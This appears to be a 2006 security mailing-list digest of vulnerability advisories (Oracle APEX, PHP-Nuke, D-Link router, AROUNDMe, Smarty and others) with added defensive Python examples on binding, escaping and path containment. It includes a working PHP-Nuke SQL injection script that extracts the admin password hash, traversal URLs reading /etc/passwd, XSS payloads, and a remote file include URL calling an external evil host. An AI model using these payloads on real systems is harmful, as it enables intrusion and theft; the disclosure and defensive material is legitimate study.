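The SDO_LRS sample statement earlier on this page, and the two fixes the DBMS_CDC_IMPDP and DBMS_XDBZ0 advisories mention (bind variables, and verifying names in the DBMS_ASSERT style), as one added example that is not Oracle's code and not part of any of the advisories. It reproduces the concatenation pattern against an in-memory SQLite table so the effect of the advisory's first argument can be observed, then shows the bound and the name-verified versions. The table, its rows, the function names and the simple-name check are all constructed here; the name check is an approximation of the DBMS_ASSERT.SIMPLE_SQL_NAME idea and is deliberately stricter than Oracle's routine.

```python
import re
import sqlite3

# Constructed rows standing in for the USER_SDO_INDEX_INFO view.
ROWS = [("ROADS", "GEOM"), ("ROADS", "RDS"), ("PARCELS", "GEOM")]

# The first argument from the advisory's sample call, as the PL/SQL literal
# decodes: the characters  "' or 5=5--'"
PAYLOAD = "\"' or 5=5--'\""


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_sdo_index_info (table_name TEXT, column_name TEXT)")
    conn.executemany("INSERT INTO user_sdo_index_info VALUES (?, ?)", ROWS)
    return conn


def count_concatenated(conn, table_name: str, column_name: str) -> int:
    """The pattern the SDO_LRS advisory shows: the caller-supplied name is pasted
    into the statement text, so a quote and '--' inside it rewrite the WHERE clause."""
    sql = ("SELECT COUNT(*) FROM user_sdo_index_info WHERE table_name = '" + table_name
           + "' AND column_name = '" + column_name + "'")
    return conn.execute(sql).fetchone()[0]


def count_bound(conn, table_name: str, column_name: str) -> int:
    """Fix 1 (bind variables): the values travel separately from the statement
    text and can never become SQL syntax, whatever characters they contain."""
    sql = "SELECT COUNT(*) FROM user_sdo_index_info WHERE table_name = ? AND column_name = ?"
    return conn.execute(sql, (table_name, column_name)).fetchone()[0]


# Unquoted Oracle-style identifier: a letter, then letters, digits, _, $ or #.
_SIMPLE_NAME = re.compile(r"^[A-Za-z][A-Za-z0-9_$#]*$")


class InvalidSqlName(ValueError):
    pass


def is_simple_sql_name(name: str) -> bool:
    """Fix 2 (name verification): true only for a plain identifier. Approximates
    the DBMS_ASSERT.SIMPLE_SQL_NAME idea; stricter than Oracle's routine, which
    also accepts double-quoted identifiers."""
    return bool(_SIMPLE_NAME.match(name))


def assert_simple_sql_name(name: str) -> str:
    if not is_simple_sql_name(name):
        raise InvalidSqlName(f"not a simple SQL name: {name!r}")
    return name


def count_verified(conn, table_name: str, column_name: str) -> int:
    """Both fixes together: verify the names, then still bind them."""
    return count_bound(conn, assert_simple_sql_name(table_name),
                       assert_simple_sql_name(column_name))


if __name__ == "__main__":
    db = make_db()
    print(count_concatenated(db, "ROADS", "RDS"))   # 1: the legitimate lookup
    print(count_concatenated(db, PAYLOAD, "RDS"))   # 3: 'or 5=5--' matched every row
    print(count_bound(db, PAYLOAD, "RDS"))          # 0: no table has that literal name
    print(is_simple_sql_name(PAYLOAD))              # False: rejected before any SQL runs
```

The second and third calls are the whole lesson: with concatenation the payload turns a one-row lookup into "every row", with a bind variable the same string is just a table name that does not exist. Name verification matters where a value must become an identifier (a table name in a DDL statement, for instance) and therefore cannot be bound.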


Cross-Site-Scripting Vulnerability in Oracle APEX WWV_FLOW_ITEM_HELP

2006-10-23 Thread ak
Name              Cross-Site-Scripting Vulnerability in Oracle APEX WWV_FLOW_ITEM_HELP
Systems Affected  Oracle APEX/HTMLDB
Severity          Medium Risk
Category          Cross Site Scripting (XSS/CSS)
Vendor URL        http://www.oracle.com/
Author            Alexander Kornbrust (ak at red-database-security.com)
Date              18 October 2006 (V 1.00)
Advisory          http://www.red-database-security.com/advisory/oracle_apex_css_wwv_flow_item_help.html

Details
###
The package WWV_FLOW_ITEM_HELP contains a cross site scripting vulnerability.

Affected Products
#
Oracle APEX/HTMLDB < 2.2.1

Patch Information
#
This bug is fixed with the patch 2.2.1 of APEX which is not part of the 
Critical Patch Update October 2006. It's necessary to upgrade your APEX/HTMLDB 
installation to 2.2.1. Patches are currently not available for Oracle 
Application Express.



History
###
03-oct-2005 Oracle secalert was informed
04-oct-2005 Bug confirmed
17-oct-2006 Oracle published CPU October 2006
18-oct-2006 Red-Database-Security published this advisory


Additional Information
##
An analysis of the Oracle CPU Oct 2006 is available here 
http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html


SQL Injection Vulnerability in Oracle WWV_FLOW_UTILITIES

2006-10-23 Thread ak
###

Name              SQL Injection Vulnerability in Oracle WWV_FLOW_UTILITIES
Systems Affected  Oracle APEX/HTMLDB
Severity          High Risk
Category          SQL Injection
Vendor URL        http://www.oracle.com/
Author            Alexander Kornbrust (ak at red-database-security.com)
Date              18 October 2006 (V 1.00)
Advisory          http://www.red-database-security.com/advisory/oracle_apex_sql_injection_wwv_flow_utilities.html

Details
###
The list of values (LOV) in wwv_flow_utilities.gen_popup_list contains a SQL 
injection vulnerability. Depending on the APEX application it is possible 
to inject custom SQL statements. The entire SQL statement is accessible from 
the URL in the parameter P_LOV. To protect the SELECT statement in the URL 
Oracle is using an MD5 checksum. By modifying the SQL statement and 
recalculating the MD5 checksum P_LOV_CHECKSUM it is possible to run custom 
SQL statements from the URL.

Sample URL:
http://apex:/pls/htmldb/wwv_flow_utilities.gen_popup_list?p_filter=&p_name=p_t02&p_element_index=1&p_hidden_elem_name=p_t01&p_form_index=0&p_max_elements=&p_escape_html=&p_ok_to_query=YES&p_flow_id=100&p_page_id=11&p_session_id=15108399238201864297&p_eval_value=&p_return_key=YES&p_translation=N&p_lov=select%20cust_last_name%20||%20'%2C%20'%20||%20cust_first_name%20d%2C%20customer_id%20r%20from%20demo_customers%20order%20by%20cust_last_name&p_lov_checksum=82C7EFB6FA3A2FA2C6E1A70FB63BB064



Affected Products
#
This bug is fixed with 2.2 of APEX which is not part of the Critical Patch 
Update October 2006. It's necessary to upgrade your APEX/HTMLDB installation 
to 2.2 or better 2.2.1.

Patches are currently not available for Oracle Application Express.

Patch Information
#
This bug is fixed with Apex 2.2 or higher.



History
###
03-oct-2005 Oracle secalert was informed
04-oct-2005 Bug confirmed
17-oct-2006 Oracle published CPU October 2006 and recommends to update to 2.2.1
18-oct-2006 Red-Database-Security published this advisory


Additional Information
##
An analysis of the Oracle CPU Oct 2006 is available here 
http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html
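The design weakness behind the P_LOV / P_LOV_CHECKSUM pair described above, as an added example that is not Oracle APEX code and not part of the advisory: an unkeyed digest over a client-visible value proves nothing about who produced the value, a keyed MAC under a server-only secret does, and keeping the statement server-side behind an opaque handle removes the need to trust the URL at all. The statement text, the server key, the store and all function names are constructed for this illustration; the checksum computed here is not claimed to match the value in the advisory's URL.

```python
import hashlib
import hmac
import secrets

# Constructed: the statement the sample URL carries in p_lov, URL-decoded.
ORIGINAL_LOV = ("select cust_last_name || ', ' || cust_first_name d, customer_id r "
                "from demo_customers order by cust_last_name")

# Constructed server-side secret. In a real deployment it never leaves the server.
SERVER_KEY = b"constructed-server-secret-not-for-reuse"


def unkeyed_checksum(text: str) -> str:
    """The weak scheme: a digest computed from the text alone."""
    return hashlib.md5(text.encode()).hexdigest().upper()


def keyed_checksum(text: str, key: bytes = SERVER_KEY) -> str:
    """The fix if the statement must stay in the URL: an HMAC under a server secret."""
    return hmac.new(key, text.encode(), hashlib.sha256).hexdigest()


def server_accepts_unkeyed(text: str, checksum: str) -> bool:
    return hmac.compare_digest(unkeyed_checksum(text), checksum)


def server_accepts_keyed(text: str, checksum: str, key: bytes = SERVER_KEY) -> bool:
    return hmac.compare_digest(keyed_checksum(text, key), checksum)


# Better still: the statement never goes to the client. Keep it server-side and
# hand out an opaque handle; the handle carries no SQL that could be altered.
_LOV_STORE = {}


def register_lov(text: str) -> str:
    handle = secrets.token_urlsafe(16)
    _LOV_STORE[handle] = text
    return handle


def lookup_lov(handle: str):
    return _LOV_STORE.get(handle)


def demo() -> dict:
    """Compare how each scheme treats a statement that was changed client-side."""
    changed = ORIGINAL_LOV.replace("demo_customers", "other_table")   # constructed change
    return {
        "md5_original": server_accepts_unkeyed(ORIGINAL_LOV, unkeyed_checksum(ORIGINAL_LOV)),
        # MD5 over the changed text needs no secret, so the server accepts it.
        "md5_changed": server_accepts_unkeyed(changed, unkeyed_checksum(changed)),
        "hmac_original": server_accepts_keyed(ORIGINAL_LOV, keyed_checksum(ORIGINAL_LOV)),
        # Without SERVER_KEY a client can only guess a key; the MAC does not verify.
        "hmac_changed_guessed_key": server_accepts_keyed(changed, keyed_checksum(changed, b"guess")),
        "handle_roundtrip": lookup_lov(register_lov(ORIGINAL_LOV)) == ORIGINAL_LOV,
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

Even with a keyed MAC the statement is still user-visible and still executed verbatim, so the handle approach (the statement lives in session state and the URL names it by id) is the one to prefer; the MAC is the smaller change for an existing design.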


Smarty-2.6.1 Remote File Include Vulnerabilities

2006-10-23 Thread crackers_child
!WWW.SiBERSAVASCiLAR.COM!


Title : Smarty-2.6.1 Remote File Include Vulnerabilities


#Author: Crackers_Child


[EMAIL PROTECTED]: [EMAIL PROTECTED]




- 
---

Application Download : 
http://smarty.php.net/do_download.php?download_file=Smarty-2.6.14.tar.gz


Bug in test_cases.php

http://www.site.com/Smarty-2.6.14/unit_test/test_cases.php?SMARTY_DIR=Sh3ll?




greets:

X_ALPEREN_X and All SiberSavascilar.CoM Members !




- [ WWW.SiBERSAVASCiLAR.COM ] 
--




Flaw in Firefox 2.0 Final

2006-10-23 Thread mike
This flaw reported by Mozilla 
http://www.mozilla.org/security/announce/2006/mfsa2006-59.html
is still unfixed in the latest Firefox 2.0 final.

This exploit works in Firefox 2.0 Final: http://lcamtuf.coredump.cx/ffoxdie.html

"Jonathan Watt and Michal Zalewski independently reported timing dependent 
testcases that trigger crashes at the same place during text display. We have 
seen no demonstration that these crashes could be reliably exploited, but they 
do show evidence of memory corruption so we presume they could be. 
Note: Thunderbird shares the browser engine with Firefox and could be 
vulnerable if JavaScript were to be enabled in mail. This is not the default 
setting and we strongly discourage users from enabling JavaScript in mail."


D-Link DSL-G624T several vulnerabilities

2006-10-23 Thread jose . palanco
D-Link DSL-G624T ADSL Router is vulnerable to several security issues.

Directory traversal
http://router/cgi-bin/webcm?getpage=/./././././././etc/passwd

http://router/cgi-bin/webcm?getpage=/./././././././etc/config.xml

Cross Site Scripting
Url:: http://router/cgi-bin/webcm
Method:: POST
Variable:: upnp%3Asettings%2Fstate
Value:: >">alert(20102006)%3B

Url:: http://router/cgi-bin/webcm
Method:: POST
Variable:: upnp%3Asettings%2Fconnection
Value:: >">alert(20102006)%3B

Url:: http://router/cgi-bin/webcm
Method:: POST
Variable:: upnp%3Asettings%2Fconnection
Value:: "+onmouseover="alert(20102006)


Directory listing
It is possible to list the /cgi-bin directory

Tested on D-Link DSL-G624T
Version: Firmware Version : V3.00B01T01.YA-C.20060616 

Discovered by:   

José Ramón Palanco: jose.palanco(at)eazel(dot).es

http://www.eazel.es

Original advisory:
http://www.eazel.es/advisory005-D-Link-DSL-G624T-directoy-transversal-xss-cross-site-scripting-directory-listing-vulnerabilities.html


[PHPADSNEW-SA-2006-002] phpAdsNew and phpPgAds 2.0.8-pr1 fix XSS vulnerability

2006-10-23 Thread Matteo Beccati

phpAdsNew / phpPgAds security advisory PHPADSNEW-SA-2006-002

Advisory ID:   PHPADSNEW-SA-2006-002
Date:  2006-Oct-28
Security risk: medium risk
Applications affected: phpAdsNew, phpPgAds
Applications not affected: Max Media Manager v0.1.x - v0.3.x
Versions affected: <= 2.0.8
Versions not affected: >= 2.0.8-pr1




Vulnerability:  HTML injection / Cross-site scripting


Description
---
Some scripts inside the admin interface were displaying parameters
collected by the delivery scripts without proper sanitizing or escaping.
The delivery scripts have public access, while the admin interface is
restricted to logged in users. An attacker could inject HTML/XSS code
which could be displayed/executed at a later time inside the admin
interface.


Solutions
-
- Upgrade to phpAdsNew or phpPgAds 2.0.8-pr1.



Contact information


The security contact for phpAdsNew and phpPgAds can be reached at:



Best regards
-- 
Matteo Beccati
http://phpadsnew.com
http://phppgads.com



-==PHP Nuke <= 7.9 SQL Injection and Bypass SQL Injection Protection vulnerabilities==-

2006-10-23 Thread paisterist . nst
<?php
/*

[N]eo [S]ecurity [T]eam [NST] - Advisory 27 - 2006-10-22

Program: PHP Nuke
Homepage: http://www.php.net
Vulnerable Versions: PHP Nuke <= 7.9
Risk: High!
Impact: Critical Risk

-==PHP Nuke <= 7.9 SQL Injection and Bypass SQL Injection Protection 
vulnerabilities==-
-

- Description
-
PHP-Nuke is an automated news system specially designed to be used on intranets 
and the Internet. The administrator has total control of his web site and registered 
users, and he will have at hand a powerful assembly of tools to maintain an 
active and 100% interactive web site using databases.

- Tested
-
localhost & many sites

- Vulnerability Description
-

The most important and critical vulnerability is in the code designed to filter 
the POST inputs to protect the script against SQL injections.


==[ mainfile.php 143-146 ]==
[...]
if (stripos_clone($postString,'%20union%20') OR 
stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') 
OR stripos_clone($postString_64,'%20union%20') OR 
stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' 
union ') OR stripos_clone($postString_64,'+union+')) {
header("Location: index.php");
die();
}
[...]
==[ end mainfile.php ]==

The protection is very good... but we can bypass it by using something like 
'/**/UNION ' or ' UNION/**/' ;)

Also I found a SQL injection vulnerability in the Encyclopedia module. The 
"eid" variable isn't filtered at any moment, so if we bypass the SQL injection 
protection we can execute arbitrary SQL commands. With a simple UNION statement 
we get the md5 hash of the admin password.

Here is the real life Proof of Concept exploit.

==Real Proof of Concept exploit==
http://www.neosecurityteam.net

*/

$host="localhost";
$path="/phpnuke/";
$prefix="nuke_";
$port="80";
$fp = fsockopen($host, $port, $errno, $errstr, 30);
$data="query=fooaa&eid=foo'/**/UNION SELECT pwd as title FROM {$prefix}_authors WHERE '1'='1";

if ($fp) {
$p="POST /phpnuke/modules.php?name=Encyclopedia&file=search HTTP/1.0\r\n";
$p.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*\r\n";
$p.="Referer: http://localhost/phpnuke/modules.php?name=Encyclopedia&file=search\r\n";
$p.="Accept-Language: es-ar\r\n";
$p.="Content-Type: application/x-www-form-urlencoded\r\n";
$p.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
$p.="Host: localhost\r\n";
$p.="Content-Length: ".strlen($data)."\r\n";
$p.="Pragma: no-cache\r\n";
$p.="Connection: keep-alive\r\n\r\n";
$p.=$data;

fwrite($fp, $p);

$content = ''; // collect the whole response before searching it
while (!feof($fp)) {
$content .= fread($fp, 4096);
}

preg_match("/([a-zA-Z0-9]{32})/", $content, $matches);

print_r($matches);
}
?>
==Real Proof of Concept exploit==

With this PoC code I get the md5 hash of the first admin (God) of the 
nuke_authors table.

- How to fix it? More information?


You can find a patch on http://www.neosecurityteam.net/foro/

Also, you can modify line 143 of mainfile.php, adding one more protection 
like:

==[ mainfile.php old line (143) ]==
[...]
if (stripos_clone($postString,'%20union%20') OR 
stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') 
OR stripos_clone($postString_64,'%20union%20') OR 
stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' 
union ') OR stripos_clone($postString_64,'+union+')) {
}
[...]
==[ end mainfile.php ]==

==[ mainfile.php new line (143) ]==
[...]
if (stripos_clone($postString,'%20union%20') OR 
stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') 
OR stripos_clone($postString_64,'%20union%20') OR 
stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' 
union ') OR stripos_clone($postString_64,'+union+') OR 
stripos_clone($postString_64, 
'*/UNION ') OR stripos_clone($postString_64, ' UNION/*')) {
}
[...]
==[ end mainfile.php ]==

That's a temporary solution to the problem. I recommend downloading the PHP 
Nuke 8.0 version in the next days... it is not free at the moment.

- References

http://www.neosecurityteam.net/index.php?action=advisories&id=27

- Credits

Anti SQL Injection protection bypass by Paisterist -> pai
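
Added example (not PHP-Nuke's code, nor the patch linked above): the substring blacklist quoted from mainfile.php, re-implemented in Python so that its gap can be shown, beside a bound-parameter query that makes the blacklist unnecessary. The schema, rows and hash value are constructed for this demonstration and run against an in-memory SQLite database.

```python
"""Added example, not PHP-Nuke's code: the substring blacklist from
mainfile.php re-implemented so its gap can be shown, beside the fix that
makes the blacklist unnecessary. The schema and rows are constructed for
this demonstration (sqlite3 in memory; no real hashes)."""
import sqlite3
from typing import List

# The substrings the mainfile.php check rejects (it also tests a
# base64-decoded copy of the body, which changes nothing below).
UNION_PATTERNS = ("%20union%20", "*/union/*", " union ", "+union+")


def blacklist_blocks(post_string: str) -> bool:
    """True if the PHP-Nuke style filter would redirect this request away."""
    lowered = post_string.lower()
    return any(p in lowered for p in UNION_PATTERNS)


def setup_db() -> sqlite3.Connection:
    """Constructed stand-in for the nuke_authors / nuke_encyclopedia tables."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE nuke_authors (aid TEXT, pwd TEXT);
        INSERT INTO nuke_authors VALUES ('God', 'constructed-hash-not-real');
        CREATE TABLE nuke_encyclopedia (eid INTEGER, title TEXT);
        INSERT INTO nuke_encyclopedia VALUES (1, 'Alpha'), (2, 'Beta');
    """)
    return con


def search_vulnerable(con: sqlite3.Connection, eid: str) -> List[str]:
    """Query built by string concatenation: 'eid' is parsed as SQL."""
    sql = f"SELECT title FROM nuke_encyclopedia WHERE eid='{eid}'"
    return [row[0] for row in con.execute(sql)]


def search_parameterized(con: sqlite3.Connection, eid: str) -> List[str]:
    """Bound parameter: 'eid' can only ever be compared as a value."""
    rows = con.execute(
        "SELECT title FROM nuke_encyclopedia WHERE eid=?", (eid,))
    return [row[0] for row in rows]


def demo() -> dict:
    """Run the advisory's payload through both paths and report what came back."""
    payload = "foo'/**/UNION SELECT pwd as title FROM nuke_authors WHERE '1'='1"
    con = setup_db()
    return {
        "filter_caught_it": blacklist_blocks("eid=" + payload),
        "concatenated": search_vulnerable(con, payload),
        "parameterized": search_parameterized(con, payload),
    }


if __name__ == "__main__":
    print(demo())
```

The path to keep is the second one: with a placeholder the same eid value is compared as data and matches nothing, whatever substrings it contains, so there is nothing left for a blacklist to guess at. The concatenated path returns only the constructed row, not a real hash.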

[SECURITY] [DSA 1197-1] New python2.4 packages fix arbitrary code execution

2006-10-23 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1197-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
October 22nd, 2006  http://www.debian.org/security/faq
- --

Package: python2.4
Vulnerability  : buffer overflow
Problem-Type   : local(remote)
Debian-specific: no
CVE ID : CVE-2006-4980
Debian Bug : 391589

Benjamin C. Wiley Sittler discovered that the repr() of the Python 
interpreter allocates insufficient memory when parsing UCS-4 Unicode
strings, which might lead to execution of arbitrary code through
a buffer overflow.

For the stable distribution (sarge) this problem has been fixed in
version 2.4.1-2sarge1. Due to build problems this update lacks fixed
packages for the m68k architecture. Once they are sorted out, binaries
for m68k will be released.

For the unstable distribution (sid) this problem has been fixed in
version 2.4.4-1.

We recommend that you upgrade your Python 2.4 packages.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.1-2sarge1.dsc
  Size/MD5 checksum: 1094 c32c8fdbdc8579afa65a35811fd0f447

http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.1-2sarge1.diff.gz
  Size/MD5 checksum:  2588405 b06709694f4fd3b04ddd0316403f3528

http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.1.orig.tar.gz
  Size/MD5 checksum:  9205762 0475655d5c6f7919fc977c42c1103af8

  Architecture independent components:


http://security.debian.org/pool/updates/main/p/python2.4/idle-python2.4_2.4.1-2sarge1_all.deb
  Size/MD5 checksum:   239606 7bfff5388898e8fa7696f34e59035779

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-doc_2.4.1-2sarge1_all.deb
  Size/MD5 checksum:  3217000 0a26b7cfe7aac553b0f9e5fdd228

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-examples_2.4.1-2sarge1_all.deb
  Size/MD5 checksum:   578596 e789e6a59b4110f986614157d83ac1ec

  Alpha architecture:


http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.1-2sarge1_alpha.deb
  Size/MD5 checksum:  3610318 cdf1d11305fee01f3eeea87bbae45266

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-dbg_2.4.1-2sarge1_alpha.deb
  Size/MD5 checksum:  6995312 a00b457959904c463a227389b5ee2d1b

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-dev_2.4.1-2sarge1_alpha.deb
  Size/MD5 checksum:  1846778 4200b817da114fbf781d0e2ee7c3f125

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-gdbm_2.4.1-2sarge1_alpha.deb
  Size/MD5 checksum:27158 c8214711b8b8c020fa6fe1c5b430857d

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-tk_2.4.1-2sarge1_alpha.deb
  Size/MD5 checksum:   111724 78583460f1f16a560346416dafdd1e97

  AMD64 architecture:


http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.1-2sarge1_amd64.deb
  Size/MD5 checksum:  3644420 f1e366e9de8c4583201db00823e740b0

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-dbg_2.4.1-2sarge1_amd64.deb
  Size/MD5 checksum:  7596356 656640c35bcf86aef6af768b754191f8

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-dev_2.4.1-2sarge1_amd64.deb
  Size/MD5 checksum:  1680266 56874b34d708320d9563bf322c009950

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-gdbm_2.4.1-2sarge1_amd64.deb
  Size/MD5 checksum:26752 5c432a87748ebf5c1299684a5b995bcf

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-tk_2.4.1-2sarge1_amd64.deb
  Size/MD5 checksum:   110664 1abaea30247985cecb0f0c394a532bbc

  ARM architecture:


http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.1-2sarge1_arm.deb
  Size/MD5 checksum:  3476134 d9122efe777d8782fde2a8ed06db0456

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-dbg_2.4.1-2sarge1_arm.deb
  Size/MD5 checksum:  7773024 0cfac06be44113fc5328878559265408

http://security.debian.org/pool/updates/main/p/python2.4/python2.4-dev_2.4.1-2sarge1_arm.deb
  Size/MD5 checksum:  1740512 f2dbd9a91f0168c2a54ff5e85991f797

http://securi

Re: Simple Machines Forum (SMF) XSS issue

2006-10-23 Thread RSnake


I wouldn't rely on that library by itself.  As I emailed Kallahar about quite
a while ago, it is still vulnerable to at least one issue:



This works in IE6.0 and Opera 9.0.  What it is doing is converting HTML
entities into their ASCII equivalent.  By doing that he is changing my
string, "	" into "	" which is a newline, and injected
within the javascript directive it breaks it up.  This is a pretty good
example of why conversion filters can be used against you.

-RSnake
http://ha.ckers.org/
http://sla.ckers.org/

On Sat, 21 Oct 2006, [EMAIL PROTECTED] wrote:


Good find on this.

Here is the fix I applied:

Find on line ~85 in Sources/Search.php:

foreach ($temp_params as $i => $data)
{
   @list ($k, $v) = explode('|\'|', $data);
   $context['search_params'][$k] = stripslashes($v);
}


Change to:

foreach ($temp_params as $i => $data)
{
   @list ($k, $v) = explode('|\'|', $data);
   $context['search_params'][$k] = RemoveXSS(stripslashes($v));
}


The RemoveXSS function is taken from the following site:
http://quickwired.com/kallahar/smallprojects/php_xss_filter_function.php

I hope that handles all the issues related to this.
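
Added example; it is not code from phpAdsNew, SMF or the RemoveXSS library. Both posts above come down to the same output-side rule: escape untrusted values at the point where they are rendered (the phpAdsNew case, where parameters captured by public delivery scripts were later shown in the admin interface), and for values that become an href, normalise the way a browser would and then allow only known-good schemes, rather than decoding entities and trusting whatever is left (RSnake's point about the RemoveXSS conversion filter). The sample values are constructed.

```python
"""Added example; not code from phpAdsNew, SMF or the RemoveXSS library.
Output-side controls that do not depend on guessing what an input filter
should strip:
- render_param(): HTML-escape a value captured by a public endpoint before
  it is shown in a privileged (admin) page.
- safe_href(): normalise first (decode entities, drop ASCII control
  characters), then allow only known-good schemes. A decode-then-blacklist
  filter does the normalisation and trusts the result; here the result is
  checked against an allowlist, so a scheme spelled with a tab or an
  entity is rejected rather than rewritten into a working one."""
import html
import re
from typing import Optional
from urllib.parse import urlsplit

# ASCII control characters (tab, newline, NUL ...) that browsers skip
# when they parse a scheme.
_CONTROL = re.compile(r"[\x00-\x1f\x7f]")
ALLOWED_SCHEMES = {"http", "https", "mailto"}


def render_param(value: str) -> str:
    """Escape an untrusted value for an HTML text node or quoted attribute."""
    return html.escape(value, quote=True)


def safe_href(value: str) -> Optional[str]:
    """Normalise a URL the way a browser would, then allowlist its scheme.

    Returns the normalised URL, or None when the link must be dropped.
    Relative URLs (no scheme) are accepted.
    """
    decoded = _CONTROL.sub("", html.unescape(value)).strip()
    scheme = urlsplit(decoded).scheme.lower()
    if scheme and scheme not in ALLOWED_SCHEMES:
        return None
    return decoded


def render_link(text: str, href: str) -> str:
    """Render an <a> element, degrading to plain text if the href is unsafe."""
    url = safe_href(href)
    if url is None:
        return render_param(text)
    return f'<a href="{render_param(url)}">{render_param(text)}</a>'


def render_admin_row(captured: dict) -> str:
    """Render parameters captured by a public endpoint inside the admin page."""
    cells = "".join(f"<td>{render_param(k)}: {render_param(v)}</td>"
                    for k, v in captured.items())
    return f"<tr>{cells}</tr>"


if __name__ == "__main__":
    # Constructed samples: one value destined for a text node, one for an href.
    print(render_admin_row({"referer": "<b>x</b>"}))
    print(render_link("home", "java\tscript:alert(1)"))
    print(render_link("home", "http://example.com/"))
```

The escaping happens where the value is written into the page, so it does not matter which entry point collected it or how long ago; and because safe_href decides by what the scheme is after normalisation rather than by what it is not, a new spelling of a bad scheme gains nothing.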


AROUNDMe 0.6.9 remote file inclusion

2006-10-23 Thread noislet . nospam

==
AROUNDMe 0.6.9 remote file inclusion
vendor site: http://barnraiser.org/
vulnerable versions: 0.6.9 (and possibly older)

discovered by: noislet  ( http://www.noislet.org/ )

vendor informed: 21.10.2006
published: 22.10.2006
==

product info:
AROUNDMe is the perfect solution for you to bring people together
around shared goals, activities and interests to form a shared
knowledge network.

==

bug details:
Input passed to the "$templatePath" is not verified before being used
to include files.

required:
register_globals = On

file:
pol_view.tpl.php (and others)

buggy code:
if (isset($poll)) {
...
include $templatePath . "poll_detail.inc.tpl.php";

==

example exploitation:
http://random.site/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=http://example.com/evilcode.php%00


--
noislet
   \ page http://www.noislet.org/
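
Added example; not code from the D-Link firmware or from AROUNDMe. One check covers both reports above: a page name that must stay under the web root (the getpage traversal) and a template path that must be a local file, not a URL, and must not carry a NUL byte (the templatePath include). Directory and file names are constructed for the demonstration; the inputs in SAMPLE_REQUESTS are the ones from the two advisories plus benign ones.

```python
"""Added example; not code from the D-Link firmware or from AROUNDMe.
Confines a user-supplied page or template name to a fixed directory.
The directory is a constructed temporary one."""
import os
import tempfile
from typing import Dict, Optional


def resolve_under(base_dir: str, user_path: str) -> Optional[str]:
    """Return the absolute path of user_path inside base_dir, or None."""
    # Refuse what can never be a local file under the root: NUL bytes
    # (truncate an appended suffix), URLs (remote include) and absolute
    # paths. os.path.join(base, "/etc/passwd") would *discard* base, so
    # the absolute-path test has to come before the join.
    if "\x00" in user_path or "://" in user_path or os.path.isabs(user_path):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    # Containment by path component, not string prefix, so that
    # /www2/x is not accepted as living inside /www.
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:            # different drives (Windows)
        inside = False
    return candidate if inside else None


# Requests from the two advisories above plus benign ones (constructed list).
SAMPLE_REQUESTS = (
    "index.html",
    "sub/../index.html",
    "/./././././././etc/passwd",
    "../../../../../../etc/passwd",
    "http://example.com/evilcode.php\x00",
)


def classify(base_dir: str) -> Dict[str, bool]:
    """Map each sample request to whether it would be served from base_dir."""
    return {p: resolve_under(base_dir, p) is not None for p in SAMPLE_REQUESTS}


def demo() -> Dict[str, bool]:
    with tempfile.TemporaryDirectory() as webroot:
        return classify(webroot)


if __name__ == "__main__":
    for request, served in demo().items():
        print(f"{'allow' if served else 'deny '}  {request!r}")
```

The realpath step is what defeats the "/./././" spelling and any symlink under the root; the commonpath comparison is what makes the check a containment test rather than a string prefix test.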


PHP Generator of Object SQL Database (path) Remote File Include Vulnerability

2006-10-23 Thread xorontr
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

PHP Generator of Object SQL Database (path) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Author: xoron

Happy Ramazan Bayramı to the whole Islamic world..!

How happy is the one who says "I am a Turk"

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

CODE:

include $path."/misc/listoption.php3";


